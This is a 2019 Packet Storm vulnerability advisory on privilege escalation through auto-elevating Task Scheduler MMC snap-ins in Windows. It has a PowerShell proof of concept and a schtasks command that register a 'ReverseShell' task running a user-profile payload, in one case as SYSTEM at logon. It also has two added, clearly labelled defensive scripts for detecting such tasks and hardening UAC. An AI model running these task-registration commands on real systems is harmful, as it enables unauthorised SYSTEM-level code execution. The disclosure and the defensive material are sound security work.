Microsoft Windows Task Scheduler Local Privilege Escalation

Posted Jul 19, 2019
Authored by Social Engineering Neo

Microsoft Windows Task Scheduler suffers from a local privilege escalation vulnerability. The Windows MMC auto-elevates members of the 'administrators' group via the GUI: MMC snap-ins (run through mmc.exe) elevate automatically without a UAC prompt, potentially leading to unintentional elevation of privilege.

tags | exploit, local
systems | windows
MD5 | 8e6e723a39a4d2907bdf7a5b25c884e6

Microsoft Windows Task Scheduler local EoP Report by Social Engineering Neo.


Affected Platforms: -
Microsoft Windows ≤10


Tested On: -
Windows 10 (builds 1809, 1903) and Windows 7 SP1.
Tested with the most recent security patches applied (July 2019).


Class: -
Improper Authorization - (CWE-285).
Local code execution under another account (up to SYSTEM).


Summary: - A typical computer user can schedule programs to run at intervals under any account existing on the host system/domain without proper authorization.


Short Description: - The Windows MMC auto-elevates members of the 'administrators' group via the GUI; MMC snap-ins (run through mmc.exe) elevate automatically without prompting UAC, potentially leading to unintentional EoP.


Long Description: - The built-in Windows component 'Microsoft Management Console' is potentially affected by improper authorization. MMC snap-ins (.msc) auto-elevate users in the 'administrators' group, including administrator accounts.
: - Only the GUI appears to be affected. Our simple PowerShell script shows this: if '-Daily -At 9pm' is changed to '-AtLogOn' or '-AtStartup', additional permissions are required.
: - The GUI, by contrast, allows a logon trigger without additional permissions.
: - An attacker able to execute 'taskschd.msc' with arguments from the CLI can perform this attack as a payload with elevated permissions, which greatly increases exploitability.
: - HIDS/HIPS without specific configuration may not raise such events as alerts or warnings and may simply log them, increasing the chance that a system administrator overlooks the issue.
: - Enterprise and personal systems that comply with basic security practices are less likely to be affected; the average computer user on a default system configuration could be vulnerable to such attacks.
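The detection gap in the last two points is where a defender has leverage: task creation is audited by Windows as Security event 4698, and the event carries the full task definition, so a rule can separate "a task was created" from "a task was created that runs a user-writable binary as SYSTEM". The following script is an added example and is not part of the original advisory. It assumes the audit subcategory "Audit Other Object Access Events" is enabled (otherwise 4698 is never written), and the TaskContent XML embedded in it is a constructed sample modelled on the advisory's PoC task; the function names are the example's own.

```powershell
# Added example, not part of the original advisory: triage Security event 4698
# ("A scheduled task was created") and flag task definitions that run as SYSTEM or
# with highest privileges from a binary outside the Windows / Program Files trees.
# 4698 is only written when the audit subcategory "Audit Other Object Access
# Events" (Success) is enabled; a HIDS that forwards it without a matching rule
# will, as the advisory notes, merely log it.

# Ways a SYSTEM principal appears in the <UserId> element of a task definition.
$SystemPrincipals = @('S-1-5-18', 'NT AUTHORITY\SYSTEM', 'SYSTEM', 'LocalSystem')

function Test-SuspiciousTaskContent {
    param(
        [Parameter(Mandatory)][string]$TaskContent,   # TaskContent XML as carried in event 4698
        [string]$TaskName = '<unknown>'
    )
    $task       = ([xml]$TaskContent).Task
    $findings   = New-Object System.Collections.Generic.List[string]
    $privileged = $false
    $untrusted  = $false

    $principal = @($task.Principals.Principal)[0]
    if ($principal) {
        if ($principal.UserId -in $SystemPrincipals) {
            $privileged = $true; $findings.Add("runs as SYSTEM ($($principal.UserId))")
        }
        if ($principal.RunLevel -eq 'HighestAvailable') {
            $privileged = $true; $findings.Add('RunLevel=HighestAvailable')
        }
    }

    # Directories a scheduled binary is normally expected to live in; anything
    # else combined with a privileged principal is worth an analyst's time.
    $trusted = @($env:SystemRoot, $env:ProgramFiles, ${env:ProgramFiles(x86)}) |
        Where-Object { $_ } | ForEach-Object { $_.TrimEnd('\') + '\' }

    foreach ($exec in @($task.Actions.Exec)) {
        if (-not $exec.Command) { continue }
        $cmd = [Environment]::ExpandEnvironmentVariables($exec.Command).Trim('"')
        $inTrusted = $false
        foreach ($dir in $trusted) {
            if ($cmd.StartsWith($dir, [StringComparison]::OrdinalIgnoreCase)) { $inTrusted = $true }
        }
        if (-not $inTrusted) { $untrusted = $true; $findings.Add("action outside system directories: $cmd") }
    }

    $severity = 'None'
    if ($privileged -or  $untrusted) { $severity = 'Low' }
    if ($privileged -and $untrusted) { $severity = 'High' }

    [pscustomobject]@{ TaskName = $TaskName; Severity = $severity; Findings = $findings.ToArray() }
}

function Get-SuspiciousTaskCreationEvents {
    param([int]$MaxEvents = 500)   # newest 4698 events from the local Security log
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4698 } -MaxEvents $MaxEvents |
        ForEach-Object {
            $evt  = $_
            # Flatten <EventData><Data Name="...">value</Data> into a hashtable.
            $data = @{}
            foreach ($d in ([xml]$evt.ToXml()).Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
            $r = Test-SuspiciousTaskContent -TaskContent $data['TaskContent'] -TaskName $data['TaskName']
            if ($r.Severity -ne 'None') {
                $r | Add-Member -MemberType NoteProperty -Name CreatedBy -Value "$($data['SubjectDomainName'])\$($data['SubjectUserName'])" -PassThru |
                     Add-Member -MemberType NoteProperty -Name TimeCreated -Value $evt.TimeCreated -PassThru
            }
        }
}

# Constructed sample TaskContent, modelled on the advisory's PoC task but with a
# logon trigger and a SYSTEM principal: the combination the GUI grants an
# Administrators member without a prompt, and which the CLI refuses.
$SampleTaskContent = @'
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>S-1-5-18</UserId><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Actions Context="Author"><Exec><Command>C:\Users\seneo\Documents\payload-x64.exe</Command></Exec></Actions>
</Task>
'@

Test-SuspiciousTaskContent -TaskName '\ReverseShell' -TaskContent $SampleTaskContent | Format-List
# Live triage (the session must be able to read the Security log):
# Get-SuspiciousTaskCreationEvents | Format-Table TimeCreated, CreatedBy, TaskName, Severity -AutoSize
```

Against the sample, the result is Severity High with three findings (SYSTEM principal, HighestAvailable, action under a user profile). Microsoft's own SYSTEM tasks come out as Low because their actions live under %SystemRoot%, so the rule separates the advisory's scenario from normal maintenance tasks; tune the trusted-directory list for software installed elsewhere rather than lowering the SYSTEM check.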


Proof of Concept: - (PowerShell)
# Windows 7 (PowerShell 3.0+, PSScheduledJob module): a scheduled job that runs the payload daily at 9pm.
Import-Module PSScheduledJob
$trigger = New-JobTrigger -Daily -At 9pm
Register-ScheduledJob -Name "ReverseShell" -FilePath 'C:\Users\seneo\Documents\payload-x64.exe' -Description "This Task Will Run the Reverse Shell." -Trigger $trigger

# Windows 8 and later (ScheduledTasks module): the same task registered in Task Scheduler as the current user.
Import-Module ScheduledTasks
$action = New-ScheduledTaskAction -Execute 'C:\Users\seneo\Documents\payload-x64.exe'
$trigger = New-ScheduledTaskTrigger -Daily -At 9pm
Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "ReverseShell" -Description "This Task Will Run the Reverse Shell."

# The script above creates a task titled "ReverseShell" with the description "This Task Will Run the Reverse Shell."
# Some additional configuration of the PowerShell may be required.
# We have our own reverse shell payload; it is up to you, "the attacker", to create your own.
#
# NOTE: The task runs every day at 9pm (system time). Change the trigger to suit your needs.
# The task only has 'user' permissions. This PoC exists to show that replacing '-Daily -At 9pm' with
# '-AtLogOn' or '-AtStartup' in either New-JobTrigger or New-ScheduledTaskTrigger results in access denied.
# The GUI is automatically elevated, whereas the CLI is not.
# ***We later noticed this PoC is essentially the same as running
#    `schtasks.exe /Create /SC ONLOGON /TN ReverseShell /TR C:\Users\seneo\Documents\payload-x64.exe /RU "NT AUTHORITY\SYSTEM"`
#    *additional permissions are needed for the CLI, not the GUI*


VIDEO: - https://youtu.be/z2C-IykCfbk **updated**
: - https://youtu.be/_leFNyo5wxM **original**


Expected Result: -
Normal users should not be able to run tasks as other users or execute programs under other accounts without proper authorization.


Observed Result: -
The task runs with 'SYSTEM' privileges for all users when triggered, with no authentication, leading to total system compromise.


Our Recommendation: -
System Administrators should follow basic security practices to prevent enterprise/client systems from being affected by this issue.
Microsoft should prevent Microsoft Management Console (MMC) snap-ins from auto-elevating without UAC authorization.
The average user should be informed about attacks like this, because most "average" users will not understand how they can be affected by them.
Proper access control implementations will greatly reduce the risk to enterprise systems.
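The first recommendation is actionable today without waiting on Microsoft: the silent elevation of mmc.exe and taskschd.msc for an Administrators member is UAC's documented behaviour at the default level (ConsentPromptBehaviorAdmin = 5, "prompt for consent for non-Windows binaries"), and at "Always notify" (value 2) Windows binaries prompt like everything else. The script below is an added example, not part of the original advisory: it reports the host's UAC posture and whether the current account matches the advisory's precondition (an Administrators member working from a filtered token), and can raise UAC to "Always notify". It assumes Windows 10 / PowerShell 5.1 for Get-LocalGroupMember; the function names are the example's own.

```powershell
# Added example, not part of the original advisory: report the local UAC policy,
# whether the current account is a local Administrators member running
# non-elevated (the account the advisory's scenario needs), and optionally raise
# UAC to "Always notify" so signed Windows binaries such as mmc.exe prompt too.
# Assumes Windows 10 / PowerShell 5.1 (Get-LocalGroupMember). A domain GPO that
# sets these values overrides a local change at the next policy refresh.

$UacPolicyPath = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'

# Documented meanings of ConsentPromptBehaviorAdmin.
$AdminPromptLevels = @{
    0 = 'Elevate without prompting ("Never notify")'
    1 = 'Prompt for credentials on the secure desktop'
    2 = 'Prompt for consent on the secure desktop ("Always notify")'
    3 = 'Prompt for credentials'
    4 = 'Prompt for consent'
    5 = 'Prompt for consent for non-Windows binaries only (default): Windows binaries such as mmc.exe elevate silently'
}

function Get-UacElevationPosture {
    $p     = Get-ItemProperty -Path $UacPolicyPath
    $level = [int]$p.ConsentPromptBehaviorAdmin
    $me    = [Security.Principal.WindowsIdentity]::GetCurrent()

    # Direct membership of BUILTIN\Administrators (S-1-5-32-544). Membership that
    # arrives only through a nested domain group is not resolved here.
    $inAdmins = $null
    try {
        $inAdmins = [bool](Get-LocalGroupMember -SID 'S-1-5-32-544' -ErrorAction Stop |
                           Where-Object { $_.SID -eq $me.User })
    } catch { }   # cmdlet unavailable (Windows 7) or lookup failed: leave unknown

    # IsInRole(Administrator) is false for an admin running with a filtered token,
    # which is exactly the state in which taskschd.msc auto-elevates for them.
    $elevated = ([Security.Principal.WindowsPrincipal]$me).IsInRole(
                    [Security.Principal.WindowsBuiltInRole]::Administrator)

    [pscustomobject]@{
        EnableLUA                  = [int]$p.EnableLUA
        ConsentPromptBehaviorAdmin = $level
        Meaning                    = $AdminPromptLevels[$level]
        PromptOnSecureDesktop      = [int]$p.PromptOnSecureDesktop
        CurrentUser                = $me.Name
        InLocalAdministrators      = $inAdmins
        ProcessIsElevated          = $elevated
        # True when this host and account match the advisory's precondition:
        # admin member, filtered token, and a UAC level that elevates silently.
        ExposedToSilentElevation   = ($inAdmins -eq $true) -and (-not $elevated) -and ($level -in @(0, 5))
    }
}

function Set-UacAlwaysNotify {
    # Requires an elevated session (writes HKLM). ConsentPromptBehaviorAdmin and
    # PromptOnSecureDesktop take effect for new elevation requests without a
    # restart; a change to EnableLUA needs a reboot.
    [CmdletBinding(SupportsShouldProcess)]
    param()
    if ($PSCmdlet.ShouldProcess($UacPolicyPath, 'Set EnableLUA=1, ConsentPromptBehaviorAdmin=2, PromptOnSecureDesktop=1')) {
        Set-ItemProperty -Path $UacPolicyPath -Name EnableLUA                  -Value 1 -Type DWord
        Set-ItemProperty -Path $UacPolicyPath -Name ConsentPromptBehaviorAdmin -Value 2 -Type DWord
        Set-ItemProperty -Path $UacPolicyPath -Name PromptOnSecureDesktop      -Value 1 -Type DWord
    }
}

Get-UacElevationPosture | Format-List
# Set-UacAlwaysNotify -WhatIf   # preview; run without -WhatIf from an elevated prompt to apply
```

In an enterprise the same three values are set through Group Policy (Computer Configuration > Windows Settings > Security Settings > Local Policies > Security Options, "User Account Control: Behavior of the elevation prompt for administrators in Admin Approval Mode"); the bigger win is not giving day-to-day accounts local administrator membership at all, since ExposedToSilentElevation is false for a standard user whatever the UAC level.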


NVD CVSS v3 Vector: -
AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H/E:P/RL:W/RC:R/CR:L/IR:L/AR:L/MAV:L/MAC:L/MPR:L/MUI:R/MS:C/MC:H/MI:H/MA:H

CVSS Base Score: - 8.2
Impact Sub score: - 6.0
Exploitability Sub score: - 1.5
CVSS Temporal Score: - 7.2
CVSS Environmental Score: - 5.7
Modified Impact Sub score: - 4.5
Overall CVSS Score: - 5.7


NVD CVSS v2 Vector: -
(AV:L/AC:L/Au:S/C:C/I:C/A:C/E:POC/RL:W/RC:UR/CDP:MH/TD:M/CR:L/IR:L/AR:L)

CVSS Base Score: - 6.8
Impact Sub score: - 10.0
Exploitability Sub score: - 3.1
CVSS Temporal Score: - 5.5
CVSS Environmental Score: - 4.8
Modified Impact Sub score: - 7.3
Overall CVSS Score: - 4.8


MITRE CVSS Vector: -
Base Vector: - AV:L/AC:L/Au:S/C:C/I:C/A:C
Base Score: - 6.8


TIMELINE: - Discovery 5th July 2019
: - Initial Report 5th July 2019
: - Case Opened 8th July 2019
: - Added Detail 8th July 2019 *Public Disclosure Date: - 30th July 2019 (25 days from initial discovery)
: - MSRC Response 9th July 2019
: - Our Response 9th July 2019
: - Case Closed 9th July 2019
: - MSRC Response 9th July 2019
: - Our Response 9th July 2019 *Public Disclosure Date: - 10th July 2019 (24 hours from closed case)

: - We thank the MSRC team for their quick response.
© 2020 Packet Storm. All rights reserved.
